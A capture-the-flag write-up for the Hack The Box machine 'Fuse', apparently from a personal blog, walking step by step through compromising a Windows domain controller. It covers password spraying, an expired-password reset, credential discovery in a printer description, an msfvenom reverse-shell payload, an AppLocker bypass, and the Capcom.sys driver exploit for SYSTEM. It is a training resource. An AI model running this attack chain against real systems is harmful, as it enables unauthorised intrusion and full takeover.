Fuse

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.193 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Fri Jan  7 21:16:49 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.193
Warning: 10.10.10.193 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.193
Host is up (0.100s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49678/tcp open  unknown
49700/tcp open  unknown

# Nmap done at Fri Jan  7 21:17:29 2022 -- 1 IP address (1 host up) scanned in 40.16 seconds

As we see, there are quite a lot of ports open.

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 10.10.10.193 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Fri Jan  7 21:18:38 2022 as: nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 -oN targeted 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.11s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 20:31:48Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h53m00s, deviation: 4h37m10s, median: 12m59s
| smb2-time: 
|   date: 2022-01-07T20:31:53
|_  start_date: 2022-01-07T20:29:22
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2022-01-07T12:31:56-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 21:19:35 2022 -- 1 IP address (1 host up) scanned in 57.23 seconds

First things first, let's add the domain names to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa-virtualbox
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2    ip6-allrouters
10.10.10.193    fabricorp.local fuse.fabricorp.local

If we take a look at the website on http://10.10.10.193, we'll see a printer website.

We can see on the Print Logs section, three logs. If we click on the View button of each log, we'll see some users.

Exploitation

Let's add the users pmerton, tlavel, sthompson, bhult and administrator to a file. At this point, we can use the cewl tool. This tool makes a dictionary based on a web page.

cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

• -w write the output to a file.

• --with-numbers accept words with numbers.

Now that we've got some users and passwords, we can try to brute force the SMB service with crackmapexec. The following command will try to log in with each users, and with each password from the dictionary. It continues trying in spite of finding valid credentials, and it doesn't show logon failures.

crackmapexec smb 10.10.10.193 -u users -p passwords --continue-on-success | grep -v FAILURE

• -u users file.

• -p passwords file.

• ---continue-on-success continues authentication attempts even after successes.

• -v select lines which don't match.

SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)                                                                             
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE                                                                                                                      
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 

It found that the Farbricorp01 password must be changed for the users tlavel and bhult.

The idea here, is to change the password of the bhult user, and then log in into the RPC server. Once we are logged in, we can enumerate all the domain users, as we have done in other HTB machines. Let's change the bhult password remotely with the smbpasswd tool.

smbpasswd -r 10.10.10.193 -U "bhult"

Old SMB password: Fabricorp01
New SMB password: alfa8sa!$
Retype new SMB password: alfa8sa!$
Password changed for user bhult on 10.10.10.193.

Now let's log with the user bhult and the password alfa8sa!$ into the RPC server.

You will have to log in into the RPC server quickly, because there is a scheduled task that changes the password that you've just already changed.

rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193

rpcclient $>

From here we can enumerate several things. The first one are the domain users.

rpcclient $> enumdomusers

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

We can clean the output of the domain users and write it into a file.

rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 -c "enumdomusers" | grep -oP "\[.*?\]" | grep "0x" -v | tr -d "[]" > users

We can also enumerate printers. If we do it, we'll see a password at the description of the printer.

rpcclient $> enumprinters

        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

Now we have a list of the domain users and the $fab@s3Rv1ce$1 password, let's see if we can have a shell via winrm as any user with that password.

crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success

• -u users file.

• -p passwords file.

• ---continue-on-success continues authentication attempts even after successes.

WINRM       10.10.10.193    5985   FUSE             [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)
WINRM       10.10.10.193    5985   FUSE             [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\Guest:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\bhult:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\astein:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1

And we see we can have a shell with the user svc-print and the password $fab@s3Rv1ce$1. Once we get the shell, we could grab the user flag.

evil-winrm -i 10.10.10.193 -u 'svc-print' -p '$fab@s3Rv1ce$1'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> type \users\svc-print\desktop\user.txt
504c8acb72ed8276d310291e93713482

Privilege Escalation

Let's see what privileges we have.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The SeLoadDriverPrivilege privilege is enabled. If you search how to escalate privileges with that privilege enabled, you'll find a great article from Tarlogic which explains how to become the NT AUTHORITY\SYSTEM user.

A user with the SeLoadDriverPrivilege assigned is allowed to dynamically load device drivers.

The activation of this privilege in the context of non-privileged users implies a significant risk due to the possibility of executing code in kernel space.

The article explains that we have to use the EplLoadDriver tool. But, if we go to it's official github, we can only download a .ccp file. This means that we have to compile it on Windows.

First, let's create a folder on the desktop called FUSE, and open a command prompt inside it.

Next, let's download the EoPLoadDriver github repository, with the .cpp file on it.

git clone https://github.com/TarlogicSecurity/EoPLoadDriver/

Cloning into 'EoPLoadDriver'...
remote: Enumerating objects: 10, done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10
Receiving objects: 100% (10/10), 5.16 KiB | 1.72 MiB/s, done.
Resolving deltas: 100% (2/2), done.

Then we'll have to open Visual Studio Code, and create a new project.

Select the Console App.

Insert the project name.

Once the project is open, we'll have to copy the eoploaddriver.cpp code and paste it into the project. Then we'll have to delete the first include line #include "stadfx.h".

To compile it, let's select Release and x64.

And finally, press Build > Rebuild Solution.

Once it ends, it will store the binary at C:\Users\alfa8sa\source\repos\EoPLoadDriver\x64\Release\EoPLoadDriver.exe. Let's move it to the FUSE folder.

It is also needed the Capcom.sys file. Download it from it's github, and move it to the FUSE folder.

Then, we'll have to download the ExploitCapcom.sln file and compile it with Visual Studio Code again. Let's clone the ExploitCapcom github repository.

git clone https://github.com/tandasat/ExploitCapcom

Cloning into 'ExploitCapcom'...
remote: Enumerating objects: 58, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 58 (delta 11), reused 11 (delta 4), pack-reused 34
Receiving objects: 100% (58/58), 142.24 KiB | 2.54 MiB/s, done.
Resolving deltas: 100% (19/19), done.

Then, on Visual Studio Code, press on File > Open > Project/Solution... and select the ExploitCapcom.sln file. Next, select the ExploitCapcom.cpp on the Solution Explorer section.

At the end of the code, we can see that the binary is executing the cmd.exe program. But I am going to change that, becouse I want to execute a malicious file called reverse.exe, which is going to send us back a reverse shell. To avoid AppLocker, I will put the malicious file in a directory listed on the UltimateAppLockerByPassList.

Then compile it like before, and move the binary to the FUSE folder.

Finally, we have the EopLoadDriver.exe, ExploitCapcom.exe and the Capcom.sys binaries on our FUSE folder.

Let's transfer those into our Linux machine with the http.server python module.

python -m http.server

On our Linux machine.

wget http://192.168.1.190:8000/EopLoadDriver.exe

wget http://192.168.1.190:8000/ExploitCapcom.exe

wget http://192.168.1.190:8000/Capcom.sys

Now we need to create the malicious file which will send us a reverse shell. It has to be named reverse.exe.

msfvenom -p windows/x64/shellreversetcp lhost=10.10.14.22 lport=4444 -f exe -o reverse.exe

Now we have to upload those binaries to the victim machine. We can do it with the Upload functionality from evil-winrm. Let's move to the C:\Windows\System32\spool\drivers\color directory on the victim machine, and upload them with evil-winrm.

upload EopLoadDriver.exe

upload ExploitCapcom.exe

upload Capcom.sys

upload reverse.exe

dir

    Directory: C:\windows\system32\spool\drivers\color


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/11/2022   2:37 PM          10576 Capcom.sys
-a----        7/16/2016   6:12 AM           1058 D50.camp
-a----        7/16/2016   6:12 AM           1079 D65.camp
-a----        2/11/2022   2:35 PM          15360 EopLoadDriver.exe
-a----        2/11/2022   2:36 PM        1875968 ExploitCapcom.exe
-a----        7/16/2016   6:12 AM            797 Graphics.gmmp
-a----        7/16/2016   6:12 AM            838 MediaSim.gmmp
-a----        7/16/2016   6:12 AM            786 Photo.gmmp
-a----        7/16/2016   6:12 AM            822 Proofing.gmmp
-a----        2/11/2022   2:37 PM           7168 reverse.exe
-a----        7/16/2016   6:12 AM         218103 RSWOP.icm
-a----        7/16/2016   6:12 AM           3144 sRGB Color Space Profile.icm
-a----        7/16/2016   6:12 AM          17155 wscRGB.cdmp
-a----        7/16/2016   6:12 AM           1578 wsRGB.cdmp

Before running the binaries, let's set a netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now all we have to do is run the following commands.

C:\windows\system32\spool\drivers\color\EopLoadDriver.exe System\CurrentControlSet\alfa8sa C:\windows\system32\spool\drivers\color\Capcom.sys

[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\alfa8sa
NTSTATUS: 00000000, WinError: 0

C:\windows\system32\spool\drivers\color\ExploitCapcom.exe

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000038
[*] Shellcode was placed at 00000205D3BD0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And we should get the reverse shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.

listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.193] 49814
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami
whoami
nt authority\system

C:\windows\system32\spool\drivers\color>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
6ad78ce332c9a222c30b6108f4ed148f